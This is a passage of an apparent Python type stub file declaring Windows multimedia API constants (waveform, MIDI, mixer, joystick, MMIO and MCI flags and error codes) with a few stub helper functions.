Incomplete\nMMSYSERR_KEYNOTFOUND: Incomplete\nMMSYSERR_READERROR: Incomplete\nMMSYSERR_WRITEERROR: Incomplete\nMMSYSERR_DELETEERROR: Incomplete\nMMSYSERR_VALNOTFOUND: Incomplete\nMMSYSERR_NODRIVERCB: Incomplete\nMMSYSERR_LASTERROR: Incomplete\nDRV_LOAD: int\nDRV_ENABLE: int\nDRV_OPEN: int\nDRV_CLOSE: int\nDRV_DISABLE: int\nDRV_FREE: int\nDRV_CONFIGURE: int\nDRV_QUERYCONFIGURE: int\nDRV_INSTALL: int\nDRV_REMOVE: int\nDRV_EXITSESSION: int\nDRV_POWER: int\nDRV_RESERVED: int\nDRV_USER: int\nDRVCNF_CANCEL: int\nDRVCNF_OK: int\nDRVCNF_RESTART: int\nDRV_CANCEL: int\nDRV_OK: int\nDRV_RESTART: int\nDRV_MCI_FIRST: int\nDRV_MCI_LAST: Incomplete\nCALLBACK_TYPEMASK: int\nCALLBACK_NULL: int\nCALLBACK_WINDOW: int\nCALLBACK_TASK: int\nCALLBACK_FUNCTION: int\nCALLBACK_THREAD: int\nCALLBACK_EVENT: int\nSND_SYNC: int\nSND_ASYNC: int\nSND_NODEFAULT: int\nSND_MEMORY: int\nSND_LOOP: int\nSND_NOSTOP: int\nSND_NOWAIT: int\nSND_ALIAS: int\nSND_ALIAS_ID: int\nSND_FILENAME: int\nSND_RESOURCE: int\nSND_PURGE: int\nSND_APPLICATION: int\nSND_ALIAS_START: int\nWAVERR_BADFORMAT: Incomplete\nWAVERR_STILLPLAYING: Incomplete\nWAVERR_UNPREPARED: Incomplete\nWAVERR_SYNC: Incomplete\nWAVERR_LASTERROR: Incomplete\nWOM_OPEN: int\nWOM_CLOSE: int\nWOM_DONE: int\nWIM_OPEN: int\nWIM_CLOSE: int\nWIM_DATA: int\nWAVE_MAPPER: int\nWAVE_FORMAT_QUERY: int\nWAVE_ALLOWSYNC: int\nWAVE_MAPPED: int\nWAVE_FORMAT_DIRECT: int\nWAVE_FORMAT_DIRECT_QUERY: Incomplete\nWHDR_DONE: int\nWHDR_PREPARED: int\nWHDR_BEGINLOOP: int\nWHDR_ENDLOOP: int\nWHDR_INQUEUE: int\nWAVECAPS_PITCH: int\nWAVECAPS_PLAYBACKRATE: int\nWAVECAPS_VOLUME: int\nWAVECAPS_LRVOLUME: int\nWAVECAPS_SYNC: int\nWAVECAPS_SAMPLEACCURATE: int\nWAVECAPS_DIRECTSOUND: int\nWAVE_INVALIDFORMAT: int\nWAVE_FORMAT_1M08: int\nWAVE_FORMAT_1S08: int\nWAVE_FORMAT_1M16: int\nWAVE_FORMAT_1S16: int\nWAVE_FORMAT_2M08: int\nWAVE_FORMAT_2S08: int\nWAVE_FORMAT_2M16: int\nWAVE_FORMAT_2S16: int\nWAVE_FORMAT_4M08: int\nWAVE_FORMAT_4S08: int\nWAVE_FORMAT_4M16: int\nWAVE_FORMAT_4S16: int\nWAVE_FORMAT_PCM: int\nWAVE_FORMAT_IEEE_FLOAT: int\nMIDIERR_UNPREPARED: Incomplete\nMIDIERR_STILLPLAYING: Incomplete\nMIDIERR_NOMAP: Incomplete\nMIDIERR_NOTREADY: Incomplete\nMIDIERR_NODEVICE: Incomplete\nMIDIERR_INVALIDSETUP: Incomplete\nMIDIERR_BADOPENMODE: Incomplete\nMIDIERR_DONT_CONTINUE: Incomplete\nMIDIERR_LASTERROR: Incomplete\nMIDIPATCHSIZE: int\nMIM_OPEN: int\nMIM_CLOSE: int\nMIM_DATA: int\nMIM_LONGDATA: int\nMIM_ERROR: int\nMIM_LONGERROR: int\nMOM_OPEN: int\nMOM_CLOSE: int\nMOM_DONE: int\nMIM_MOREDATA: int\nMOM_POSITIONCB: int\nMIDI_IO_STATUS: int\nMIDI_CACHE_ALL: int\nMIDI_CACHE_BESTFIT: int\nMIDI_CACHE_QUERY: int\nMIDI_UNCACHE: int\nMOD_MIDIPORT: int\nMOD_SYNTH: int\nMOD_SQSYNTH: int\nMOD_FMSYNTH: int\nMOD_MAPPER: int\nMIDICAPS_VOLUME: int\nMIDICAPS_LRVOLUME: int\nMIDICAPS_CACHE: int\nMIDICAPS_STREAM: int\nMHDR_DONE: int\nMHDR_PREPARED: int\nMHDR_INQUEUE: int\nMHDR_ISSTRM: int\nMEVT_F_SHORT: int\nMEVT_F_LONG: int\nMEVT_F_CALLBACK: int\n\ndef MEVT_EVENTTYPE(x): ...\ndef MEVT_EVENTPARM(x): ...\n\nMIDISTRM_ERROR: int\nMIDIPROP_SET: int\nMIDIPROP_GET: int\nMIDIPROP_TIMEDIV: int\nMIDIPROP_TEMPO: int\nAUXCAPS_CDAUDIO: int\nAUXCAPS_AUXIN: int\nAUXCAPS_VOLUME: int\nAUXCAPS_LRVOLUME: int\nMIXER_SHORT_NAME_CHARS: int\nMIXER_LONG_NAME_CHARS: int\nMIXERR_INVALLINE: Incomplete\nMIXERR_INVALCONTROL: Incomplete\nMIXERR_INVALVALUE: Incomplete\nMIXERR_LASTERROR: Incomplete\nMIXER_OBJECTF_HANDLE: int\nMIXER_OBJECTF_MIXER: int\nMIXER_OBJECTF_HMIXER: Incomplete\nMIXER_OBJECTF_WAVEOUT: int\nMIXER_OBJECTF_HWAVEOUT: 
Incomplete\nMIXER_OBJECTF_WAVEIN: int\nMIXER_OBJECTF_HWAVEIN: Incomplete\nMIXER_OBJECTF_MIDIOUT: int\nMIXER_OBJECTF_HMIDIOUT: Incomplete\nMIXER_OBJECTF_MIDIIN: int\nMIXER_OBJECTF_HMIDIIN: Incomplete\nMIXER_OBJECTF_AUX: int\nMIXERLINE_LINEF_ACTIVE: int\nMIXERLINE_LINEF_DISCONNECTED: int\nMIXERLINE_LINEF_SOURCE: int\nMIXERLINE_COMPONENTTYPE_DST_FIRST: int\nMIXERLINE_COMPONENTTYPE_DST_UNDEFINED: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_DIGITAL: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_LINE: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_MONITOR: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_SPEAKERS: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_HEADPHONES: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_TELEPHONE: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_WAVEIN: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_VOICEIN: Incomplete\nMIXERLINE_COMPONENTTYPE_DST_LAST: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_FIRST: int\nMIXERLINE_COMPONENTTYPE_SRC_UNDEFINED: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_DIGITAL: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_LINE: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_MICROPHONE: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_TELEPHONE: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_WAVEOUT: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_AUXILIARY: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_ANALOG: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_LAST: Incomplete\nMIXERLINE_TARGETTYPE_UNDEFINED: int\nMIXERLINE_TARGETTYPE_WAVEOUT: int\nMIXERLINE_TARGETTYPE_WAVEIN: int\nMIXERLINE_TARGETTYPE_MIDIOUT: int\nMIXERLINE_TARGETTYPE_MIDIIN: int\nMIXERLINE_TARGETTYPE_AUX: int\nMIXER_GETLINEINFOF_DESTINATION: int\nMIXER_GETLINEINFOF_SOURCE: int\nMIXER_GETLINEINFOF_LINEID: int\nMIXER_GETLINEINFOF_COMPONENTTYPE: int\nMIXER_GETLINEINFOF_TARGETTYPE: int\nMIXER_GETLINEINFOF_QUERYMASK: int\nMIXERCONTROL_CONTROLF_UNIFORM: int\nMIXERCONTROL_CONTROLF_MULTIPLE: int\nMIXERCONTROL_CONTROLF_DISABLED: int\nMIXERCONTROL_CT_CLASS_MASK: int\nMIXERCONTROL_CT_CLASS_CUSTOM: int\nMIXERCONTROL_CT_CLASS_METER: int\nMIXERCONTROL_CT_CLASS_SWITCH: int\nMIXERCONTROL_CT_CLASS_NUMBER: int\nMIXERCONTROL_CT_CLASS_SLIDER: int\nMIXERCONTROL_CT_CLASS_FADER: int\nMIXERCONTROL_CT_CLASS_TIME: int\nMIXERCONTROL_CT_CLASS_LIST: int\nMIXERCONTROL_CT_SUBCLASS_MASK: int\nMIXERCONTROL_CT_SC_SWITCH_BOOLEAN: int\nMIXERCONTROL_CT_SC_SWITCH_BUTTON: int\nMIXERCONTROL_CT_SC_METER_POLLED: int\nMIXERCONTROL_CT_SC_TIME_MICROSECS: int\nMIXERCONTROL_CT_SC_TIME_MILLISECS: int\nMIXERCONTROL_CT_SC_LIST_SINGLE: int\nMIXERCONTROL_CT_SC_LIST_MULTIPLE: int\nMIXERCONTROL_CT_UNITS_MASK: int\nMIXERCONTROL_CT_UNITS_CUSTOM: int\nMIXERCONTROL_CT_UNITS_BOOLEAN: int\nMIXERCONTROL_CT_UNITS_SIGNED: int\nMIXERCONTROL_CT_UNITS_UNSIGNED: int\nMIXERCONTROL_CT_UNITS_DECIBELS: int\nMIXERCONTROL_CT_UNITS_PERCENT: int\nMIXERCONTROL_CONTROLTYPE_CUSTOM: Incomplete\nMIXERCONTROL_CONTROLTYPE_BOOLEANMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_SIGNEDMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_PEAKMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_UNSIGNEDMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_BOOLEAN: Incomplete\nMIXERCONTROL_CONTROLTYPE_ONOFF: Incomplete\nMIXERCONTROL_CONTROLTYPE_MUTE: Incomplete\nMIXERCONTROL_CONTROLTYPE_MONO: Incomplete\nMIXERCONTROL_CONTROLTYPE_LOUDNESS: Incomplete\nMIXERCONTROL_CONTROLTYPE_STEREOENH: Incomplete\nMIXERCONTROL_CONTROLTYPE_BUTTON: Incomplete\nMIXERCONTROL_CONTROLTYPE_DECIBELS: Incomplete\nMIXERCONTROL_CONTROLTYPE_SIGNED: 
Incomplete\nMIXERCONTROL_CONTROLTYPE_UNSIGNED: Incomplete\nMIXERCONTROL_CONTROLTYPE_PERCENT: Incomplete\nMIXERCONTROL_CONTROLTYPE_SLIDER: Incomplete\nMIXERCONTROL_CONTROLTYPE_PAN: Incomplete\nMIXERCONTROL_CONTROLTYPE_QSOUNDPAN: Incomplete\nMIXERCONTROL_CONTROLTYPE_FADER: Incomplete\nMIXERCONTROL_CONTROLTYPE_VOLUME: Incomplete\nMIXERCONTROL_CONTROLTYPE_BASS: Incomplete\nMIXERCONTROL_CONTROLTYPE_TREBLE: Incomplete\nMIXERCONTROL_CONTROLTYPE_EQUALIZER: Incomplete\nMIXERCONTROL_CONTROLTYPE_SINGLESELECT: Incomplete\nMIXERCONTROL_CONTROLTYPE_MUX: Incomplete\nMIXERCONTROL_CONTROLTYPE_MULTIPLESELECT: Incomplete\nMIXERCONTROL_CONTROLTYPE_MIXER: Incomplete\nMIXERCONTROL_CONTROLTYPE_MICROTIME: Incomplete\nMIXERCONTROL_CONTROLTYPE_MILLITIME: Incomplete\nMIXER_GETLINECONTROLSF_ALL: int\nMIXER_GETLINECONTROLSF_ONEBYID: int\nMIXER_GETLINECONTROLSF_ONEBYTYPE: int\nMIXER_GETLINECONTROLSF_QUERYMASK: int\nMIXER_GETCONTROLDETAILSF_VALUE: int\nMIXER_GETCONTROLDETAILSF_LISTTEXT: int\nMIXER_GETCONTROLDETAILSF_QUERYMASK: int\nMIXER_SETCONTROLDETAILSF_VALUE: int\nMIXER_SETCONTROLDETAILSF_CUSTOM: int\nMIXER_SETCONTROLDETAILSF_QUERYMASK: int\nTIMERR_NOERROR: int\nTIMERR_NOCANDO: Incomplete\nTIMERR_STRUCT: Incomplete\nTIME_ONESHOT: int\nTIME_PERIODIC: int\nTIME_CALLBACK_FUNCTION: int\nTIME_CALLBACK_EVENT_SET: int\nTIME_CALLBACK_EVENT_PULSE: int\nJOYERR_NOERROR: int\nJOYERR_PARMS: Incomplete\nJOYERR_NOCANDO: Incomplete\nJOYERR_UNPLUGGED: Incomplete\nJOY_BUTTON1: int\nJOY_BUTTON2: int\nJOY_BUTTON3: int\nJOY_BUTTON4: int\nJOY_BUTTON1CHG: int\nJOY_BUTTON2CHG: int\nJOY_BUTTON3CHG: int\nJOY_BUTTON4CHG: int\nJOY_BUTTON5: int\nJOY_BUTTON6: int\nJOY_BUTTON7: int\nJOY_BUTTON8: int\nJOY_BUTTON9: int\nJOY_BUTTON10: int\nJOY_BUTTON11: int\nJOY_BUTTON12: int\nJOY_BUTTON13: int\nJOY_BUTTON14: int\nJOY_BUTTON15: int\nJOY_BUTTON16: int\nJOY_BUTTON17: int\nJOY_BUTTON18: int\nJOY_BUTTON19: int\nJOY_BUTTON20: int\nJOY_BUTTON21: int\nJOY_BUTTON22: int\nJOY_BUTTON23: int\nJOY_BUTTON24: int\nJOY_BUTTON25: int\nJOY_BUTTON26: int\nJOY_BUTTON27: int\nJOY_BUTTON28: int\nJOY_BUTTON29: int\nJOY_BUTTON30: int\nJOY_BUTTON31: int\nJOY_BUTTON32: int\nJOY_POVFORWARD: int\nJOY_POVRIGHT: int\nJOY_POVBACKWARD: int\nJOY_POVLEFT: int\nJOY_RETURNX: int\nJOY_RETURNY: int\nJOY_RETURNZ: int\nJOY_RETURNR: int\nJOY_RETURNU: int\nJOY_RETURNV: int\nJOY_RETURNPOV: int\nJOY_RETURNBUTTONS: int\nJOY_RETURNRAWDATA: int\nJOY_RETURNPOVCTS: int\nJOY_RETURNCENTERED: int\nJOY_USEDEADZONE: int\nJOY_RETURNALL: Incomplete\nJOY_CAL_READALWAYS: int\nJOY_CAL_READXYONLY: int\nJOY_CAL_READ3: int\nJOY_CAL_READ4: int\nJOY_CAL_READXONLY: int\nJOY_CAL_READYONLY: int\nJOY_CAL_READ5: int\nJOY_CAL_READ6: int\nJOY_CAL_READZONLY: int\nJOY_CAL_READRONLY: int\nJOY_CAL_READUONLY: int\nJOY_CAL_READVONLY: int\nJOYSTICKID1: int\nJOYSTICKID2: int\nJOYCAPS_HASZ: int\nJOYCAPS_HASR: int\nJOYCAPS_HASU: int\nJOYCAPS_HASV: int\nJOYCAPS_HASPOV: int\nJOYCAPS_POV4DIR: int\nJOYCAPS_POVCTS: int\nMMIOERR_BASE: int\nMMIOERR_FILENOTFOUND: Incomplete\nMMIOERR_OUTOFMEMORY: Incomplete\nMMIOERR_CANNOTOPEN: Incomplete\nMMIOERR_CANNOTCLOSE: Incomplete\nMMIOERR_CANNOTREAD: Incomplete\nMMIOERR_CANNOTWRITE: Incomplete\nMMIOERR_CANNOTSEEK: Incomplete\nMMIOERR_CANNOTEXPAND: Incomplete\nMMIOERR_CHUNKNOTFOUND: Incomplete\nMMIOERR_UNBUFFERED: Incomplete\nMMIOERR_PATHNOTFOUND: Incomplete\nMMIOERR_ACCESSDENIED: Incomplete\nMMIOERR_SHARINGVIOLATION: Incomplete\nMMIOERR_NETWORKERROR: Incomplete\nMMIOERR_TOOMANYOPENFILES: Incomplete\nMMIOERR_INVALIDFILE: Incomplete\nCFSEPCHAR: Incomplete\nMMIO_RWMODE: int\nMMIO_SHAREMODE: 
int\nMMIO_CREATE: int\nMMIO_PARSE: int\nMMIO_DELETE: int\nMMIO_EXIST: int\nMMIO_ALLOCBUF: int\nMMIO_GETTEMP: int\nMMIO_DIRTY: int\nMMIO_READ: int\nMMIO_WRITE: int\nMMIO_READWRITE: int\nMMIO_COMPAT: int\nMMIO_EXCLUSIVE: int\nMMIO_DENYWRITE: int\nMMIO_DENYREAD: int\nMMIO_DENYNONE: int\nMMIO_FHOPEN: int\nMMIO_EMPTYBUF: int\nMMIO_TOUPPER: int\nMMIO_INSTALLPROC: int\nMMIO_GLOBALPROC: int\nMMIO_REMOVEPROC: int\nMMIO_UNICODEPROC: int\nMMIO_FINDPROC: int\nMMIO_FINDCHUNK: int\nMMIO_FINDRIFF: int\nMMIO_FINDLIST: int\nMMIO_CREATERIFF: int\nMMIO_CREATELIST: int\nMMIOM_READ: int\nMMIOM_WRITE: int\nMMIOM_SEEK: int\nMMIOM_OPEN: int\nMMIOM_CLOSE: int\nMMIOM_WRITEFLUSH: int\nMMIOM_RENAME: int\nMMIOM_USER: int\nSEEK_SET: int\nSEEK_CUR: int\nSEEK_END: int\nMMIO_DEFAULTBUFFER: int\nMCIERR_INVALID_DEVICE_ID: Incomplete\nMCIERR_UNRECOGNIZED_KEYWORD: Incomplete\nMCIERR_UNRECOGNIZED_COMMAND: Incomplete\nMCIERR_HARDWARE: Incomplete\nMCIERR_INVALID_DEVICE_NAME: Incomplete\nMCIERR_OUT_OF_MEMORY: Incomplete\nMCIERR_DEVICE_OPEN: Incomplete\nMCIERR_CANNOT_LOAD_DRIVER: Incomplete\nMCIERR_MISSING_COMMAND_STRING: Incomplete\nMCIERR_PARAM_OVERFLOW: Incomplete\nMCIERR_MISSING_STRING_ARGUMENT: Incomplete\nMCIERR_BAD_INTEGER: Incomplete\nMCIERR_PARSER_INTERNAL: Incomplete\nMCIERR_DRIVER_INTERNAL: Incomplete\nMCIERR_MISSING_PARAMETER: Incomplete\nMCIERR_UNSUPPORTED_FUNCTION: Incomplete\nMCIERR_FILE_NOT_FOUND: Incomplete\nMCIERR_DEVICE_NOT_READY: Incomplete\nMCIERR_INTERNAL: Incomplete\nMCIERR_DRIVER: Incomplete\nMCIERR_CANNOT_USE_ALL: Incomplete\nMCIERR_MULTIPLE: Incomplete\nMCIERR_EXTENSION_NOT_FOUND: Incomplete\nMCIERR_OUTOFRANGE: Incomplete\nMCIERR_FLAGS_NOT_COMPATIBLE: Incomplete\nMCIERR_FILE_NOT_SAVED: Incomplete\nMCIERR_DEVICE_TYPE_REQUIRED: Incomplete\nMCIERR_DEVICE_LOCKED: Incomplete\nMCIERR_DUPLICATE_ALIAS: Incomplete\nMCIERR_BAD_CONSTANT: Incomplete\nMCIERR_MUST_USE_SHAREABLE: Incomplete\nMCIERR_MISSING_DEVICE_NAME: Incomplete\nMCIERR_BAD_TIME_FORMAT: Incomplete\nMCIERR_NO_CLOSING_QUOTE: Incomplete\nMCIERR_DUPLICATE_FLAGS: Incomplete\nMCIERR_INVALID_FILE: Incomplete\nMCIERR_NULL_PARAMETER_BLOCK: Incomplete\nMCIERR_UNNAMED_RESOURCE: Incomplete\nMCIERR_NEW_REQUIRES_ALIAS: Incomplete\nMCIERR_NOTIFY_ON_AUTO_OPEN: Incomplete\nMCIERR_NO_ELEMENT_ALLOWED: Incomplete\nMCIERR_NONAPPLICABLE_FUNCTION: Incomplete\nMCIERR_ILLEGAL_FOR_AUTO_OPEN: Incomplete\nMCIERR_FILENAME_REQUIRED: Incomplete\nMCIERR_EXTRA_CHARACTERS: Incomplete\nMCIERR_DEVICE_NOT_INSTALLED: Incomplete\nMCIERR_GET_CD: Incomplete\nMCIERR_SET_CD: Incomplete\nMCIERR_SET_DRIVE: Incomplete\nMCIERR_DEVICE_LENGTH: Incomplete\nMCIERR_DEVICE_ORD_LENGTH: Incomplete\nMCIERR_NO_INTEGER: Incomplete\nMCIERR_WAVE_OUTPUTSINUSE: Incomplete\nMCIERR_WAVE_SETOUTPUTINUSE: Incomplete\nMCIERR_WAVE_INPUTSINUSE: Incomplete\nMCIERR_WAVE_SETINPUTINUSE: Incomplete\nMCIERR_WAVE_OUTPUTUNSPECIFIED: Incomplete\nMCIERR_WAVE_INPUTUNSPECIFIED: Incomplete\nMCIERR_WAVE_OUTPUTSUNSUITABLE: Incomplete\nMCIERR_WAVE_SETOUTPUTUNSUITABLE: Incomplete\nMCIERR_WAVE_INPUTSUNSUITABLE: Incomplete\nMCIERR_WAVE_SETINPUTUNSUITABLE: Incomplete\nMCIERR_SEQ_DIV_INCOMPATIBLE: Incomplete\nMCIERR_SEQ_PORT_INUSE: Incomplete\nMCIERR_SEQ_PORT_NONEXISTENT: Incomplete\nMCIERR_SEQ_PORT_MAPNODEVICE: Incomplete\nMCIERR_SEQ_PORT_MISCERROR: Incomplete\nMCIERR_SEQ_TIMER: Incomplete\nMCIERR_SEQ_PORTUNSPECIFIED: Incomplete\nMCIERR_SEQ_NOMIDIPRESENT: Incomplete\nMCIERR_NO_WINDOW: Incomplete\nMCIERR_CREATEWINDOW: Incomplete\nMCIERR_FILE_READ: Incomplete\nMCIERR_FILE_WRITE: Incomplete\nMCIERR_NO_IDENTITY: 
Incomplete\nMCIERR_CUSTOM_DRIVER_BASE: Incomplete\nMCI_FIRST: int\nMCI_OPEN: int\nMCI_CLOSE: int\nMCI_ESCAPE: int\nMCI_PLAY: int\nMCI_SEEK: int\nMCI_STOP: int\nMCI_PAUSE: int\nMCI_INFO: int\nMCI_GETDEVCAPS: int\nMCI_SPIN: int\nMCI_SET: int\nMCI_STEP: int\nMCI_RECORD: int\nMCI_SYSINFO: int\nMCI_BREAK: int\nMCI_SAVE: int\nMCI_STATUS: int\nMCI_CUE: int\nMCI_REALIZE: int\nMCI_WINDOW: int\nMCI_PUT: int\nMCI_WHERE: int\nMCI_FREEZE: int\nMCI_UNFREEZE: int\nMCI_LOAD: int\nMCI_CUT: int\nMCI_COPY: int\nMCI_PASTE: int\nMCI_UPDATE: int\nMCI_RESUME: int\nMCI_DELETE: int\nMCI_USER_MESSAGES: Incomplete\nMCI_LAST: int\nMCI_DEVTYPE_VCR: int\nMCI_DEVTYPE_VIDEODISC: int\nMCI_DEVTYPE_OVERLAY: int\nMCI_DEVTYPE_CD_AUDIO: int\nMCI_DEVTYPE_DAT: int\nMCI_DEVTYPE_SCANNER: int\nMCI_DEVTYPE_ANIMATION: int\nMCI_DEVTYPE_DIGITAL_VIDEO: int\nMCI_DEVTYPE_OTHER: int\nMCI_DEVTYPE_WAVEFORM_AUDIO: int\nMCI_DEVTYPE_SEQUENCER: int\nMCI_DEVTYPE_FIRST: int\nMCI_DEVTYPE_LAST: int\nMCI_DEVTYPE_FIRST_USER: int\nMCI_MODE_NOT_READY: Incomplete\nMCI_MODE_STOP: Incomplete\nMCI_MODE_PLAY: Incomplete\nMCI_MODE_RECORD: Incomplete\nMCI_MODE_SEEK: Incomplete\nMCI_MODE_PAUSE: Incomplete\nMCI_MODE_OPEN: Incomplete\nMCI_FORMAT_MILLISECONDS: int\nMCI_FORMAT_HMS: int\nMCI_FORMAT_MSF: int\nMCI_FORMAT_FRAMES: int\nMCI_FORMAT_SMPTE_24: int\nMCI_FORMAT_SMPTE_25: int\nMCI_FORMAT_SMPTE_30: int\nMCI_FORMAT_SMPTE_30DROP: int\nMCI_FORMAT_BYTES: int\nMCI_FORMAT_SAMPLES: int\nMCI_FORMAT_TMSF: int\n\ndef MCI_MSF_MINUTE(msf): ...\ndef MCI_MSF_SECOND(msf): ...\ndef MCI_MSF_FRAME(msf): ...\ndef MCI_TMSF_TRACK(tmsf): ...\ndef MCI_TMSF_MINUTE(tmsf): ...\ndef MCI_TMSF_SECOND(tmsf): ...\ndef MCI_TMSF_FRAME(tmsf): ...\ndef MCI_HMS_HOUR(hms): ...\ndef MCI_HMS_MINUTE(hms): ...\ndef MCI_HMS_SECOND(hms): ...\n\nMCI_NOTIFY_SUCCESSFUL: int\nMCI_NOTIFY_SUPERSEDED: int\nMCI_NOTIFY_ABORTED: int\nMCI_NOTIFY_FAILURE: int\nMCI_NOTIFY: int\nMCI_WAIT: int\nMCI_FROM: int\nMCI_TO: int\nMCI_TRACK: int\nMCI_OPEN_SHAREABLE: int\nMCI_OPEN_ELEMENT: int\nMCI_OPEN_ALIAS: int\nMCI_OPEN_ELEMENT_ID: int\nMCI_OPEN_TYPE_ID: int\nMCI_OPEN_TYPE: int\nMCI_SEEK_TO_START: int\nMCI_SEEK_TO_END: int\nMCI_STATUS_ITEM: int\nMCI_STATUS_START: int\nMCI_STATUS_LENGTH: int\nMCI_STATUS_POSITION: int\nMCI_STATUS_NUMBER_OF_TRACKS: int\nMCI_STATUS_MODE: int\nMCI_STATUS_MEDIA_PRESENT: int\nMCI_STATUS_TIME_FORMAT: int\nMCI_STATUS_READY: int\nMCI_STATUS_CURRENT_TRACK: int\nMCI_INFO_PRODUCT: int\nMCI_INFO_FILE: int\nMCI_INFO_MEDIA_UPC: int\nMCI_INFO_MEDIA_IDENTITY: int\nMCI_INFO_NAME: int\nMCI_INFO_COPYRIGHT: int\nMCI_GETDEVCAPS_ITEM: int\nMCI_GETDEVCAPS_CAN_RECORD: int\nMCI_GETDEVCAPS_HAS_AUDIO: int\nMCI_GETDEVCAPS_HAS_VIDEO: int\nMCI_GETDEVCAPS_DEVICE_TYPE: int\nMCI_GETDEVCAPS_USES_FILES: int\nMCI_GETDEVCAPS_COMPOUND_DEVICE: int\nMCI_GETDEVCAPS_CAN_EJECT: int\nMCI_GETDEVCAPS_CAN_PLAY: int\nMCI_GETDEVCAPS_CAN_SAVE: int\nMCI_SYSINFO_QUANTITY: int\nMCI_SYSINFO_OPEN: int\nMCI_SYSINFO_NAME: int\nMCI_SYSINFO_INSTALLNAME: int\nMCI_SET_DOOR_OPEN: int\nMCI_SET_DOOR_CLOSED: int\nMCI_SET_TIME_FORMAT: int\nMCI_SET_AUDIO: int\nMCI_SET_VIDEO: int\nMCI_SET_ON: int\nMCI_SET_OFF: int\nMCI_SET_AUDIO_ALL: int\nMCI_SET_AUDIO_LEFT: int\nMCI_SET_AUDIO_RIGHT: int\nMCI_BREAK_KEY: int\nMCI_BREAK_HWND: int\nMCI_BREAK_OFF: int\nMCI_RECORD_INSERT: int\nMCI_RECORD_OVERWRITE: int\nMCI_SAVE_FILE: int\nMCI_LOAD_FILE: int\nMCI_VD_MODE_PARK: Incomplete\nMCI_VD_MEDIA_CLV: Incomplete\nMCI_VD_MEDIA_CAV: Incomplete\nMCI_VD_MEDIA_OTHER: Incomplete\nMCI_VD_FORMAT_TRACK: int\nMCI_VD_PLAY_REVERSE: int\nMCI_VD_PLAY_FAST: int\nMCI_VD_PLAY_SPEED: 
int\nMCI_VD_PLAY_SCAN: int\nMCI_VD_PLAY_SLOW: int\nMCI_VD_SEEK_REVERSE: int\nMCI_VD_STATUS_SPEED: int\nMCI_VD_STATUS_FORWARD: int\nMCI_VD_STATUS_MEDIA_TYPE: int\nMCI_VD_STATUS_SIDE: int\nMCI_VD_STATUS_DISC_SIZE: int\nMCI_VD_GETDEVCAPS_CLV: int\nMCI_VD_GETDEVCAPS_CAV: int\nMCI_VD_SPIN_UP: int\nMCI_VD_SPIN_DOWN: int\nMCI_VD_GETDEVCAPS_CAN_REVERSE: int\nMCI_VD_GETDEVCAPS_FAST_RATE: int\nMCI_VD_GETDEVCAPS_SLOW_RATE: int\nMCI_VD_GETDEVCAPS_NORMAL_RATE: int\nMCI_VD_STEP_FRAMES: int\nMCI_VD_STEP_REVERSE: int\nMCI_VD_ESCAPE_STRING: int\nMCI_CDA_STATUS_TYPE_TRACK: int\nMCI_CDA_TRACK_AUDIO: Incomplete\nMCI_CDA_TRACK_OTHER: Incomplete\nMCI_WAVE_PCM: Incomplete\nMCI_WAVE_MAPPER: Incomplete\nMCI_WAVE_OPEN_BUFFER: int\nMCI_WAVE_SET_FORMATTAG: int\nMCI_WAVE_SET_CHANNELS: int\nMCI_WAVE_SET_SAMPLESPERSEC: int\nMCI_WAVE_SET_AVGBYTESPERSEC: int\nMCI_WAVE_SET_BLOCKALIGN: int\nMCI_WAVE_SET_BITSPERSAMPLE: int\nMCI_WAVE_INPUT: int\nMCI_WAVE_OUTPUT: int\nMCI_WAVE_STATUS_FORMATTAG: int\nMCI_WAVE_STATUS_CHANNELS: int\nMCI_WAVE_STATUS_SAMPLESPERSEC: int\nMCI_WAVE_STATUS_AVGBYTESPERSEC: int\nMCI_WAVE_STATUS_BLOCKALIGN: int\nMCI_WAVE_STATUS_BITSPERSAMPLE: int\nMCI_WAVE_STATUS_LEVEL: int\nMCI_WAVE_SET_ANYINPUT: int\nMCI_WAVE_SET_ANYOUTPUT: int\nMCI_WAVE_GETDEVCAPS_INPUTS: int\nMCI_WAVE_GETDEVCAPS_OUTPUTS: int\nMCI_SEQ_DIV_PPQN: Incomplete\nMCI_SEQ_DIV_SMPTE_24: Incomplete\nMCI_SEQ_DIV_SMPTE_25: Incomplete\nMCI_SEQ_DIV_SMPTE_30DROP: Incomplete\nMCI_SEQ_DIV_SMPTE_30: Incomplete\nMCI_SEQ_FORMAT_SONGPTR: int\nMCI_SEQ_FILE: int\nMCI_SEQ_MIDI: int\nMCI_SEQ_SMPTE: int\nMCI_SEQ_NONE: int\nMCI_SEQ_MAPPER: int\nMCI_SEQ_STATUS_TEMPO: int\nMCI_SEQ_STATUS_PORT: int\nMCI_SEQ_STATUS_SLAVE: int\nMCI_SEQ_STATUS_MASTER: int\nMCI_SEQ_STATUS_OFFSET: int\nMCI_SEQ_STATUS_DIVTYPE: int\nMCI_SEQ_STATUS_NAME: int\nMCI_SEQ_STATUS_COPYRIGHT: int\nMCI_SEQ_SET_TEMPO: int\nMCI_SEQ_SET_PORT: int\nMCI_SEQ_SET_SLAVE: int\nMCI_SEQ_SET_MASTER: int\nMCI_SEQ_SET_OFFSET: int\nMCI_ANIM_OPEN_WS: int\nMCI_ANIM_OPEN_PARENT: int\nMCI_ANIM_OPEN_NOSTATIC: 